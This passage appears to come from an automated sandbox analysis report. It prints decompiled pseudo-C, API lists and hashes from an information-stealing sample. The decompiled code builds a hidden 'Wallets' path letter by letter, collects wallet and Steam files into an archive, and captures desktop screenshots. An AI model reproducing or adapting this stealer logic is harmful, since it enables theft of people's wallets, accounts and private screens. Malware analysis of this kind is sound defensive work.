                                        				void* _t443;
                                        				CHAR* _t444;
                                        				signed int _t450;
                                        				void* _t451;
                                        				void* _t453;
                                        				CHAR* _t454;
                                        				void* _t457;
                                        				void* _t459;
                                        				void* _t460;
                                        				void* _t462;
                                        
                                        				_push(0xffffffff);
                                        				_push(E29DC33FE);
                                        				_push( *[fs:0x0]);
                                        				_t233 =  *0x29dd5664; // 0xd9555f04
                                        				_t234 = _t233 ^ _t450;
                                        				_v24 = _t234;
                                        				_push(_t234);
                                        				 *[fs:0x0] =  &_v16;
                                        				_v1604 = _a4;
                                        				_v8 = 0;
                                        				_v1352 = 0xf;
                                        				_v1356 = 0;
                                        				_v1372 = 0;
                                        				_v8 = 3;
                                        				E29DB5640( &_v1288, 0, 0x3e8);
                                        				_t453 = _t451 - 0x650 + 0xc;
                                        				_push( &_v1288);
                                        				_push(0);
                                        				_push(0);
                                        				if(_a8 == 0) {
                                        					_t238 =  *0x29dd8500(0, 0x1a);
                                        					__eflags = _t238;
                                        					_t407 = (0 | _t238 < 0x00000000) - 0x00000001 &  &_v1288;
                                        					__eflags = _t407;
                                        					_t240 = _t407;
                                        					_t20 = _t240 + 1; // 0x0
                                        					_t442 = _t20;
                                        					do {
                                        						_t363 =  *_t240;
                                        						_t240 = _t240 + 1;
                                        						__eflags = _t363;
                                        					} while (_t363 != 0);
                                        					L6:
                                        					E29D892C0( &_v1372, _t407, _t240 - _t442);
                                        					_t408 =  &_v1372;
                                        					_t244 = E29D97CC0( &_v1484,  &_v1372,  &_a12);
                                        					_t454 = _t453 - 0x10;
                                        					_v8 = 4;
                                        					_v1608 = _t454;
                                        					E29D97D80( &_a68, _t454, _t244);
                                        					E29DA4C40( &_v1624, _t467);
                                        					_v8 = 6;
                                        					if(_v1464 >= 0x10) {
                                        						_push(_v1484);
                                        						E29DADF3B();
                                        						_t454 = _t454 + 4;
                                        					}
                                        					_t368 = _v1620;
                                        					_t248 = _v1624;
                                        					_t351 = 0;
                                        					_v1464 = 0xf;
                                        					_v1468 = 0;
                                        					_v1484 = 0;
                                        					_v1608 = _t368;
                                        					_v1600 = _t248;
                                        					if(_t248 == _t368) {
                                        						L71:
                                        						if(_t248 == _t351) {
                                        							L79:
                                        							_v1624 = _t351;
                                        							_v1620 = _t351;
                                        							_v1616 = _t351;
                                        							if(_v1352 >= 0x10) {
                                        								_push(_v1372);
                                        								E29DADF3B();
                                        								_t454 = _t454 + 4;
                                        							}
                                        							_v1352 = 0xf;
                                        							_v1356 = _t351;
                                        							_v1372 = _t351;
                                        							if(_a32 >= 0x10) {
                                        								_t408 = _a12;
                                        								_push(_a12);
                                        								E29DADF3B();
                                        								_t454 = _t454 + 4;
                                        							}
                                        							_a32 = 0xf;
                                        							_a28 = _t351;
                                        							_a12 = _t351;
                                        							if(_a60 >= 0x10) {
                                        								_push(_a40);
                                        								E29DADF3B();
                                        								_t454 = _t454 + 4;
                                        							}
                                        							_a60 = 0xf;
                                        							_a56 = _t351;
                                        							_a40 = _t351;
                                        							if(_a88 >= 0x10) {
                                        								_push(_a68);
                                        								E29DADF3B();
                                        							}
                                        							 *[fs:0x0] = _v16;
                                        							_pop(_t427);
                                        							_pop(_t443);
                                        							_pop(_t352);
                                        							return E29DADF46(0, _t352, _v24 ^ _t450, _t408, _t427, _t443);
                                        						}
                                        						_t428 = _t368;
                                        						_t444 = _t248;
                                        						if(_t248 == _t368) {
                                        							L78:
                                        							_push(_t248);
                                        							E29DADF3B();
                                        							_t454 = _t454 + 4;
                                        							goto L79;
                                        						}
                                        						do {
                                        							if(_t444[0x14] >= 8) {
                                        								_t408 =  *_t444;
                                        								_push( *_t444);
                                        								E29DADF3B();
                                        								_t454 = _t454 + 4;
                                        							}
                                        							_t444[0x14] = 7;
                                        							_t444[0x10] = _t351;
                                        							 *_t444 = 0;
                                        							_t444 =  &(_t444[0x1c]);
                                        						} while (_t444 != _t428);
                                        						_t248 = _v1624;
                                        						goto L78;
                                        					} else {
                                        						do {
                                        							_v1436 = 7;
                                        							_v1440 = _t351;
                                        							_v1456 = 0;
                                        							E29D97940( &_v1456, _v1600, _t351);
                                        							_v8 = 7;
                                        							_t263 = E29DA48F0( &_v1456,  &_v1540, 0);
                                        							_v8 = 8;
                                        							_t265 = E29D97CC0( &_v1596,  &_v1372,  &_a12);
                                        							_t411 =  &_v1568;
                                        							_v8 = 9;
                                        							_t267 = E29D89980(_t263, _t265,  &_v1568);
                                        							_t457 = _t454 + 0x10;
                                        							_t431 = _t267;
                                        							_v1380 = 0xf;
                                        							_v1384 = 0;
                                        							_v1400 = 0;
                                        							if( &_v1400 != _t431) {
                                        								_v1380 = 0xf;
                                        								_v1384 = 0;
                                        								_v1400 = 0;
                                        								if( *((intOrPtr*)(_t431 + 0x14)) >= 0x10) {
                                        									_t411 =  *_t431;
                                        									_v1400 =  *_t431;
                                        									 *_t431 = 0;
                                        								} else {
                                        									E29DAE1F0( &_v1400, _t431,  *((intOrPtr*)(_t431 + 0x10)) + 1);
                                        									_t457 = _t457 + 0xc;
                                        								}
                                        								_v1384 =  *((intOrPtr*)(_t431 + 0x10));
                                        								_v1380 =  *((intOrPtr*)(_t431 + 0x14));
                                        								 *((intOrPtr*)(_t431 + 0x10)) = 0;
                                        								 *((intOrPtr*)(_t431 + 0x14)) = 0;
                                        							}
                                        							if(_v1548 >= 0x10) {
                                        								_t411 = _v1568;
                                        								_push(_v1568);
                                        								E29DADF3B();
                                        								_t457 = _t457 + 4;
                                        							}
                                        							_v1548 = 0xf;
                                        							_v1552 = 0;
                                        							_v1568 = 0;
                                        							if(_v1576 >= 0x10) {
                                        								_push(_v1596);
                                        								E29DADF3B();
                                        								_t457 = _t457 + 4;
                                        							}
                                        							_v1576 = 0xf;
                                        							_v1580 = 0;
                                        							_v1596 = 0;
                                        							_v8 = 0xe;
                                        							if(_v1520 >= 0x10) {
                                        								_push(_v1540);
                                        								E29DADF3B();
                                        								_t457 = _t457 + 4;
                                        							}
                                        							_v1524 = 0;
                                        							_v1540 = 0;
                                        							_v1520 = 0xf;
                                        							_t270 = E29DA48F0( &_v1456,  &_v1316, _t411);
                                        							_v8 = 0xf;
                                        							_t272 = E29D97CC0( &_v1344,  &_v1372,  &_a12);
                                        							_v8 = 0x10;
                                        							_t274 = E29D89980(_t270, _t272,  &_v1428);
                                        							_t459 = _t457 + 0x10;
                                        							_v8 = 0x11;
                                        							_t275 = E29DA4990(_t274,  &_v1512,  &_v1512);
                                        							if(_t275[0xa] >= 8) {
                                        								_t275 =  *_t275;
                                        							}
                                        							_t276 = GetFileAttributesW(_t275);
                                        							if(_t276 == 0xffffffff || (_t276 & 0x00000010) != 0) {
                                        								_t356 = 0;
                                        								_t434 = 0;
                                        								__eflags = 0;
                                        							} else {
                                        								_t434 = 1;
                                        								_t356 = 0;
                                        							}
                                        							if(_v1492 >= 8) {
                                        								_push(_v1512);
                                        								E29DADF3B();
                                        								_t459 = _t459 + 4;
                                        							}
                                        							_v1492 = 7;
                                        							_v1496 = _t356;
                                        							_v1512 = 0;
                                        							if(_v1408 >= 0x10) {
                                        								_push(_v1428);
                                        								E29DADF3B();
                                        								_t459 = _t459 + 4;
                                        							}
                                        							_v1408 = 0xf;
                                        							_v1412 = _t356;
                                        							_v1428 = _t356;
                                        							if(_v1324 >= 0x10) {
                                        								_push(_v1344);
                                        								E29DADF3B();
                                        								_t459 = _t459 + 4;
                                        							}
                                        							_v8 = 0xe;
                                        							_v1324 = 0xf;
                                        							_v1328 = _t356;
                                        							_v1344 = _t356;
                                        							if(_v1296 >= 0x10) {
                                        								_push(_v1316);
                                        								E29DADF3B();
                                        								_t459 = _t459 + 4;
                                        							}
                                        							_v1296 = 0xf;
                                        							_v1300 = _t356;
                                        							_v1316 = _t356;
                                        							if(_t434 != _t356) {
                                        								_t329 = _v1604;
                                        								 *((intOrPtr*)(_t329 + 0x1c)) =  *((intOrPtr*)(_t329 + 0x1c)) + 1;
                                        								 *0x29dd82f4 =  *0x29dd82f4 +  *((intOrPtr*)(_t329 + 0x1c));
                                        								 *0x29dd82e0 =  *0x29dd82e0 + 1;
                                        							}
                                        							E29DB5640( &_v288, _t356, 0x104);
                                        							_t460 = _t459 + 0xc;
                                        							lstrcatA( &_v288, "\\");
                                        							lstrcatA( &_v288, "W");
                                        							lstrcatA( &_v288, "a");
                                        							lstrcatA( &_v288, "l");
                                        							lstrcatA( &_v288, "l");
                                        							lstrcatA( &_v288, "e");
                                        							lstrcatA( &_v288, "t");
                                        							lstrcatA( &_v288, "s");
                                        							lstrcatA( &_v288, "\\");
                                        							_t291 = _a40;
                                        							if(_a60 < 0x10) {
                                        								_t291 =  &_a40;
                                        							}
                                        							_t417 =  &_v288;
                                        							lstrcatA( &_v288, _t291);
                                        							lstrcatA( &_v288, "\\");
                                        							_t296 = E29DA48F0( &_v1456,  &_v1316,  &_v288);
                                        							_v8 = 0x12;
                                        							if(_t296[0x14] >= 0x10) {
                                        								_t296 =  *_t296;
                                        							}
                                        							lstrcatA( &_v288, _t296);
                                        							_v8 = 0xe;
                                        							if(_v1296 >= 0x10) {
                                        								_t417 = _v1316;
                                        								_push(_v1316);
                                        								E29DADF3B();
                                        								_t460 = _t460 + 4;
                                        							}
                                        							_t299 = E29DA48F0( &_v1456,  &_v1428, _t417);
                                        							_t418 =  &_v1344;
                                        							_v8 = 0x13;
                                        							_t301 = E29D97CC0( &_v1344,  &_v1372,  &_a12);
                                        							_v8 = 0x14;
                                        							_t304 = E29D89980(_t299, _t301,  &_v1316);
                                        							_t462 = _t460 + 0x10;
                                        							_v8 = 0x15;
                                        							if(_t304[0x14] >= 0x10) {
                                        								_t304 =  *_t304;
                                        							}
                                        							_t437 = CreateFileA(_t304, 0x80000000, 3, 0, 3, 0x80, 0);
                                        							if(_t437 != 0xffffffff) {
                                        								 *0x29dd836c(_t437,  &_v1632);
                                        								CloseHandle(_t437);
                                        							}
                                        							if(_v1296 >= 0x10) {
                                        								_t418 = _v1316;
                                        								_push(_v1316);
                                        								E29DADF3B();
                                        								_t462 = _t462 + 4;
                                        							}
                                        							_v1296 = 0xf;
                                        							_v1300 = 0;
                                        							_v1316 = 0;
                                        							if(_v1324 >= 0x10) {
                                        								_push(_v1344);
                                        								E29DADF3B();
                                        								_t462 = _t462 + 4;
                                        							}
                                        							_v8 = 0xe;
                                        							_v1324 = 0xf;
                                        							_v1328 = 0;
                                        							_v1344 = 0;
                                        							if(_v1408 >= 0x10) {
                                        								_push(_v1428);
                                        								E29DADF3B();
                                        								_t462 = _t462 + 4;
                                        							}
                                        							_t307 = E29DA48F0( &_v1456,  &_v1428, _t418);
                                        							_v8 = 0x16;
                                        							_t309 = E29D97CC0( &_v1344,  &_v1372,  &_a12);
                                        							_t408 =  &_v1316;
                                        							_v8 = 0x17;
                                        							_t311 = E29D89980(_t307, _t309,  &_v1316);
                                        							_t454 = _t462 + 0x10;
                                        							_v8 = 0x18;
                                        							if( *((intOrPtr*)(_t311 + 0x14)) >= 0x10) {
                                        								_t311 =  *_t311;
                                        							}
                                        							_t390 =  *((intOrPtr*)(_v1604 + 0x20));
                                        							if(_t390 != 0) {
                                        								__eflags =  *_t390 - 2;
                                        								if( *_t390 == 2) {
                                        									_t408 = _t311;
                                        									 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t390 + 4)), _t311,  &_v288, 0, 2);
                                        								} else {
                                        									 *0x29dd8814 = 0x80000;
                                        								}
                                        							} else {
                                        								 *0x29dd8814 = 0x10000;
                                        							}
                                        							if(_v1296 >= 0x10) {
                                        								_push(_v1316);
                                        								E29DADF3B();
                                        								_t454 = _t454 + 4;
                                        							}
                                        							_v1296 = 0xf;
                                        							_v1300 = 0;
                                        							_v1316 = 0;
                                        							if(_v1324 >= 0x10) {
                                        								_push(_v1344);
                                        								E29DADF3B();
                                        								_t454 = _t454 + 4;
                                        							}
                                        							_v1324 = 0xf;
                                        							_v1328 = 0;
                                        							_v1344 = 0;
                                        							if(_v1408 >= 0x10) {
                                        								_t408 = _v1428;
                                        								_push(_v1428);
                                        								E29DADF3B();
                                        								_t454 = _t454 + 4;
                                        							}
                                        							if(_v1380 >= 0x10) {
                                        								_push(_v1400);
                                        								E29DADF3B();
                                        								_t454 = _t454 + 4;
                                        							}
                                        							_v8 = 6;
                                        							if(_v1436 >= 8) {
                                        								_push(_v1456);
                                        								E29DADF3B();
                                        								_t454 = _t454 + 4;
                                        							}
                                        							_t314 =  &(_v1600[0x1c]);
                                        							_t351 = 0;
                                        							_v1600 = _t314;
                                        						} while (_t314 != _v1608);
                                        						_t368 = _v1620;
                                        						_t248 = _v1624;
                                        						goto L71;
                                        					}
                                        				}
                                        				_t345 =  *0x29dd8500(0, 0x1c);
                                        				_t407 = (_t345 < 0x00000000) - 0x00000001 &  &_v1288;
                                        				_t347 = (_t345 < 0x00000000) - 0x00000001 &  &_v1288;
                                        				_t16 = _t347 + 1; // 0x0
                                        				_t442 = _t16;
                                        				do {
                                        					_t402 =  *_t347;
                                        					_t347 = _t347 + 1;
                                        					_t467 = _t402;
                                        				} while (_t402 != 0);
                                        				goto L6;
                                        			}
                                        0x29d95fac
                                        0x29d95fb4
                                        0x29d95fba
                                        0x29d95fc0
                                        0x29d95fcc
                                        0x29d95fd4
                                        0x29d95fd5
                                        0x29d95fda
                                        0x29d95fda
                                        0x29d95fdd
                                        0x29d95fe3
                                        0x29d95fe9
                                        0x29d95ff5
                                        0x29d95ff7
                                        0x29d95ffd
                                        0x29d95ffe
                                        0x29d96003
                                        0x29d96003
                                        0x29d9600c
                                        0x29d96014
                                        0x29d96015
                                        0x29d9601a
                                        0x29d9601a
                                        0x29d9601d
                                        0x29d96028
                                        0x29d96030
                                        0x29d96031
                                        0x29d96036
                                        0x29d96036
                                        0x29d9603f
                                        0x29d96042
                                        0x29d96044
                                        0x29d9604a
                                        0x29d96056
                                        0x29d9605c
                                        0x00000000
                                        0x29d9605c
                                        0x29d959ff
                                        0x29d9591c
                                        0x29d95930
                                        0x29d95932
                                        0x29d95934
                                        0x29d95934
                                        0x29d95937
                                        0x29d95937
                                        0x29d95939
                                        0x29d9593a
                                        0x29d9593a
                                        0x00000000

                                        APIs
                                        • _memset.LIBCMT ref: 29D95903
                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 29D9591C
                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 29D95943
                                        • _memmove.LIBCMT ref: 29D95AC6
                                        • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 29D95BDB
                                        • _memset.LIBCMT ref: 29D95CDC
                                        • lstrcatA.KERNEL32(?,29DCD7BC,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95CF0
                                        • lstrcatA.KERNEL32(?,29DCFD20,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95D02
                                        • lstrcatA.KERNEL32(?,29DCFD24,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95D14
                                        • lstrcatA.KERNEL32(?,29DCFD28,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95D26
                                        • lstrcatA.KERNEL32(?,29DCFD28,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95D38
                                        • lstrcatA.KERNEL32(?,29DCFD2C,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95D4A
                                        • lstrcatA.KERNEL32(?,29DCFD30,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95D5C
                                        • lstrcatA.KERNEL32(?,29DCFD34,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95D6E
                                        • lstrcatA.KERNEL32(?,29DCD7BC,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95D80
                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95D9A
                                        • lstrcatA.KERNEL32(?,29DCD7BC,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95DAC
                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95DDB
                                        • CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 29D95E67
                                        • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 29D95E7C
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95E83
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$File$FolderPath_memset$AttributesCloseCreateHandleSize_memmove
                                        • String ID:
                                        • API String ID: 987438778-0
                                        • Opcode ID: c03a9fcff50a90992b02e1cbab615481bed6120979d61e1d7fde374d552b9bd6
                                        • Instruction ID: 64f57320a12b24b14d9a6abe91a6f5b70960d0bb64cf702c967632000ca97b6e
                                        • Opcode Fuzzy Hash: c03a9fcff50a90992b02e1cbab615481bed6120979d61e1d7fde374d552b9bd6
                                        • Instruction Fuzzy Hash: BD42CDB1C106989FDB20DF68CC80BDEB7B5AF59301F0486EDE509A3241EB359A85DF61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetDesktopWindow.USER32 ref: 29DA50FD
                                        • GetWindowRect.USER32(00000000,?), ref: 29DA510A
                                        • GetDC.USER32(00000000), ref: 29DA5111
                                        • CreateCompatibleDC.GDI32(00000000), ref: 29DA511A
                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 29DA512B
                                        • SelectObject.GDI32(00000000,00000000), ref: 29DA5136
                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 29DA5156
                                        • GlobalFix.KERNEL32(?), ref: 29DA51B3
                                        • GlobalSize.KERNEL32(?), ref: 29DA51C0
                                        • SelectObject.GDI32(00000000,?), ref: 29DA51E0
                                        • DeleteObject.GDI32(?), ref: 29DA51FE
                                        • DeleteObject.GDI32(00000000), ref: 29DA5205
                                        • ReleaseDC.USER32(00000000,00000000), ref: 29DA520D
                                        • CloseWindow.USER32(00000000), ref: 29DA5214
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Object$Window$CompatibleCreateDeleteGlobalSelect$BitmapCloseDesktopRectReleaseSize
                                        • String ID: P5Ts$\screenshot.jpg
                                        • API String ID: 527014841-2297798693
                                        • Opcode ID: 9cf46837e2fea2faa88ebba03a7ccbae74a792b00cfd41d6ea8a3d414f396a52
                                        • Instruction ID: df8050272bbc8a4900883e3d4326759eb3bc6ebd9ef56d2fc43c2fb118106785
                                        • Opcode Fuzzy Hash: 9cf46837e2fea2faa88ebba03a7ccbae74a792b00cfd41d6ea8a3d414f396a52
                                        • Instruction Fuzzy Hash: D941DEB6950248AFDB05EFE4DC89EAEB7B9FF48B01F108519F905E3240D738A9059B70
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 65%
                                        			E29D93B60(void* __ebx, CHAR* __esi, intOrPtr _a4) {
                                        				signed int _v12;
                                        				char _v280;
                                        				char _v544;
                                        				char _v808;
                                        				struct _WIN32_FIND_DATAA _v1128;
                                        				void* __edi;
                                        				signed int _t22;
                                        				intOrPtr* _t44;
                                        				void* _t46;
                                        				void* _t59;
                                        				CHAR* _t60;
                                        				signed int _t61;
                                        				void* _t62;
                                        				void* _t63;
                                        
                                        				_t60 = __esi;
                                        				_t46 = __ebx;
                                        				_t22 =  *0x29dd5664; // 0xd9555f04
                                        				_v12 = _t22 ^ _t61;
                                        				wsprintfA( &_v808, "%s\\%s", __esi, _a4);
                                        				_t63 = _t62 + 0x10;
                                        				_t55 =  &_v808;
                                        				_t59 = FindFirstFileA( &_v808,  &_v1128);
                                        				if(_t59 == 0xffffffff) {
                                        					L11:
                                        					return E29DADF46(_t27, _t46, _v12 ^ _t61, _t55, _t59, _t60);
                                        				} else {
                                        					do {
                                        						_push(".");
                                        						_push( &(_v1128.cFileName));
                                        						if( *0x29dd8550() != 0) {
                                        							_push("..");
                                        							_push( &(_v1128.cFileName));
                                        							if( *0x29dd8550() != 0) {
                                        								E29DB5640( &_v544, 0, 0x104);
                                        								E29DB5640( &_v280, 0, 0x104);
                                        								_t63 = _t63 + 0x18;
                                        								lstrcatA( &_v544, "\\Soft\\Steam\\");
                                        								lstrcatA( &_v544,  &(_v1128.cFileName));
                                        								lstrcatA( &_v280, _t60);
                                        								_t55 =  &_v280;
                                        								lstrcatA( &_v280, "\\");
                                        								lstrcatA( &_v280,  &(_v1128.cFileName));
                                        								_t44 =  *0x29dd82ec; // 0x0
                                        								if(_t44 != 0) {
                                        									if( *_t44 == 2) {
                                        										_t55 =  &_v280;
                                        										 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t44 + 4)),  &_v280,  &_v544, 0, 2);
                                        									} else {
                                        										 *0x29dd8814 = 0x80000;
                                        									}
                                        								} else {
                                        									 *0x29dd8814 = 0x10000;
                                        								}
                                        							}
                                        						}
                                        					} while (FindNextFileA(_t59,  &_v1128) != 0);
                                        					_t27 = FindClose(_t59);
                                        					goto L11;
                                        				}
                                        			}


















                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Find$File_memset$CloseFirstNextwsprintf
                                        • String ID: %s\%s$\Soft\Steam\
                                        • API String ID: 2894742787-2995071678
                                        • Opcode ID: 3b58b005f005f4742c55ef2d6fdb3a3369816000dd75f323c5bc5931b6cfee58
                                        • Instruction ID: a54d0fca7f26e443a9756d7a76e61d476238c634107b42321dbc492c25ca62f3
                                        • Opcode Fuzzy Hash: 3b58b005f005f4742c55ef2d6fdb3a3369816000dd75f323c5bc5931b6cfee58
                                        • Instruction Fuzzy Hash: A8417EB2540218ABC715EBA0DD89FDAB7B8AB58B00F40859DE605D7040EB349649EF71
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 78%
                                        			E29DAC840(signed int* __ecx, signed int __edx, intOrPtr _a4, signed int _a8, char* _a12) {
                                        				signed int _v12;
                                        				char _v16;
                                        				char _v17;
                                        				char _v18;
                                        				char _v19;
                                        				char _v20;
                                        				char _v21;
                                        				char _v22;
                                        				char _v23;
                                        				signed int _v24;
                                        				char _v25;
                                        				char _v26;
                                        				char _v27;
                                        				char _v28;
                                        				char _v32;
                                        				char _v33;
                                        				char _v44;
                                        				signed int _v48;
                                        				intOrPtr _v52;
                                        				char _v54;
                                        				char _v56;
                                        				char _v320;
                                        				signed int _v324;
                                        				signed int _v328;
                                        				char _v336;
                                        				char _v596;
                                        				char _v856;
                                        				signed int _v860;
                                        				char* _v864;
                                        				char* _v868;
                                        				char _v1128;
                                        				intOrPtr _v1132;
                                        				intOrPtr _v1136;
                                        				short _v1140;
                                        				short _v1142;
                                        				short _v1144;
                                        				signed int _v1148;
                                        				intOrPtr _v1152;
                                        				intOrPtr _v1156;
                                        				int _v1160;
                                        				char* _v1164;
                                        				signed int _v1168;
                                        				signed int _v1172;
                                        				unsigned int _v1176;
                                        				short _v1178;
                                        				signed int _v1180;
                                        				char _v1184;
                                        				signed int _v1188;
                                        				signed int _v1189;
                                        				signed int _v1196;
                                        				signed int _v1200;
                                        				signed int _v1204;
                                        				void* _v1208;
                                        				signed int* _v1212;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t297;
                                        				intOrPtr _t299;
                                        				char* _t304;
                                        				intOrPtr _t305;
                                        				int _t310;
                                        				short _t314;
                                        				short _t315;
                                        				signed int _t318;
                                        				signed int _t320;
                                        				signed int _t323;
                                        				signed int _t326;
                                        				int _t327;
                                        				signed int _t332;
                                        				signed int _t334;
                                        				signed int _t341;
                                        				signed char _t344;
                                        				unsigned int _t348;
                                        				unsigned int _t351;
                                        				char _t355;
                                        				signed int _t358;
                                        				signed int _t359;
                                        				signed int _t360;
                                        				intOrPtr _t362;
                                        				void* _t365;
                                        				void* _t366;
                                        				signed int _t378;
                                        				signed int _t380;
                                        				void* _t381;
                                        				signed int _t383;
                                        				signed int _t388;
                                        				intOrPtr _t396;
                                        				signed int _t400;
                                        				intOrPtr* _t401;
                                        				void* _t402;
                                        				signed int _t408;
                                        				signed int _t412;
                                        				signed char _t421;
                                        				signed char _t427;
                                        				signed char _t436;
                                        				signed int _t457;
                                        				intOrPtr _t458;
                                        				unsigned int _t461;
                                        				unsigned int _t466;
                                        				signed int _t475;
                                        				signed int _t478;
                                        				signed int _t485;
                                        				signed int _t501;
                                        				signed int _t546;
                                        				void* _t562;
                                        				unsigned int _t569;
                                        				signed int _t574;
                                        				signed int _t576;
                                        				void* _t582;
                                        				signed int _t589;
                                        				signed int _t590;
                                        				signed int _t591;
                                        				signed char* _t593;
                                        				intOrPtr _t594;
                                        				void* _t595;
                                        				signed int _t598;
                                        				void* _t599;
                                        
                                        				_t506 = __edx;
                                        				_t297 =  *0x29dd5664; // 0xd9555f04
                                        				_v12 = _t297 ^ _t598;
                                        				_t299 = _a4;
                                        				_t407 = __ecx;
                                        				_t552 = _a12;
                                        				_v1212 = __ecx;
                                        				_t587 = __edx;
                                        				if(__ecx[5] == 0) {
                                        					__eflags = __ecx[0xb];
                                        					if(__ecx[0xb] == 0) {
                                        						__eflags =  *__ecx;
                                        						_v1208 = 0;
                                        						if( *__ecx != 0) {
                                        							__eflags = _t552 - 4;
                                        							if(_t552 != 4) {
                                        								_v1208 = 0xc;
                                        							}
                                        						}
                                        						 *0x29dd85cc( &_v320, _t299);
                                        						__eflags = _v320;
                                        						if(_v320 == 0) {
                                        							L91:
                                        							_t302 = 0x10000;
                                        							goto L92;
                                        						} else {
                                        							_t304 =  &_v320;
                                        							do {
                                        								__eflags =  *_t304 - 0x5c;
                                        								if( *_t304 == 0x5c) {
                                        									 *_t304 = 0x2f;
                                        								}
                                        								_t304 = _t304 + 1;
                                        								__eflags =  *_t304;
                                        							} while ( *_t304 != 0);
                                        							__eflags = _t552 - 4;
                                        							_t506 = _t506 & 0xffffff00 | _t552 == 0x00000004;
                                        							_v1189 = _t506;
                                        							__eflags = _t506;
                                        							if(_t506 == 0) {
                                        								L16:
                                        								_v1188 = 0;
                                        							} else {
                                        								_t401 =  &_v320;
                                        								_t18 = _t401 + 1; // 0x1
                                        								_t552 = _t18;
                                        								do {
                                        									_t501 =  *_t401;
                                        									_t401 = _t401 + 1;
                                        									__eflags = _t501;
                                        								} while (_t501 != 0);
                                        								_t402 = _t401 - _t552;
                                        								__eflags =  *((char*)(_t598 + _t402 - 0x13d)) - 0x2f;
                                        								_v1188 = 1;
                                        								if( *((char*)(_t598 + _t402 - 0x13d)) == 0x2f) {
                                        									goto L16;
                                        								}
                                        							}
                                        							_v1204 = 8;
                                        							__eflags = _t506;
                                        							if(_t506 != 0) {
                                        								L19:
                                        								_v1204 = 0;
                                        							} else {
                                        								_t552 =  &_v320;
                                        								_t400 = E29DABB50( &_v320);
                                        								__eflags = _t400;
                                        								if(_t400 != 0) {
                                        									goto L19;
                                        								}
                                        							}
                                        							_t305 = _a12;
                                        							__eflags = _t305 - 2;
                                        							if(_t305 != 2) {
                                        								__eflags = _t305 - 1;
                                        								if(_t305 != 1) {
                                        									__eflags = _t305 - 3;
                                        									if(_t305 != 3) {
                                        										__eflags = _t305 - 4;
                                        										if(_t305 != 4) {
                                        											goto L91;
                                        										} else {
                                        											_t302 = E29DAC4A0(_t552, _t407);
                                        											goto L28;
                                        										}
                                        									} else {
                                        										_t506 = _a8;
                                        										_t302 = E29DAC370(_t587, _t552, _t407, _a8);
                                        										goto L28;
                                        									}
                                        								} else {
                                        									_t302 = E29DAC210(_t407, _t587, _a8);
                                        									goto L28;
                                        								}
                                        							} else {
                                        								_t302 = E29DAC190(_t587, _t407);
                                        								L28:
                                        								_t587 = 0;
                                        								__eflags = _t302;
                                        								if(_t302 != 0) {
                                        									L92:
                                        									__eflags = _v12 ^ _t598;
                                        									return E29DADF46(_t302, _t407, _v12 ^ _t598, _t506, _t552, _t587);
                                        								} else {
                                        									_v324 = 0;
                                        									 *0x29dd85cc( &_v1128, 0x29dcd617);
                                        									 *0x29dd85cc( &_v856,  &_v320);
                                        									_t310 = lstrlenA( &_v856);
                                        									__eflags = _v1188;
                                        									_v1160 = _t310;
                                        									if(_v1188 != 0) {
                                        										lstrcatA( &_v856, "/");
                                        										_t37 =  &_v1160;
                                        										 *_t37 = _v1160 + 1;
                                        										__eflags =  *_t37;
                                        									}
                                        									 *0x29dd85cc( &_v596, 0x29dcd617);
                                        									_v1142 = 0;
                                        									_v1176 =  *((intOrPtr*)(_t407 + 0x68));
                                        									_t314 = 8;
                                        									_v860 = _t587;
                                        									_v1148 = _t587;
                                        									_v336 = 1;
                                        									_v328 = _t587;
                                        									_v1184 = 0x140b17;
                                        									_v1172 = _t587;
                                        									_v1180 = 8;
                                        									__eflags =  *_t407 - _t587;
                                        									if( *_t407 != _t587) {
                                        										__eflags = _v1189;
                                        										if(_v1189 == 0) {
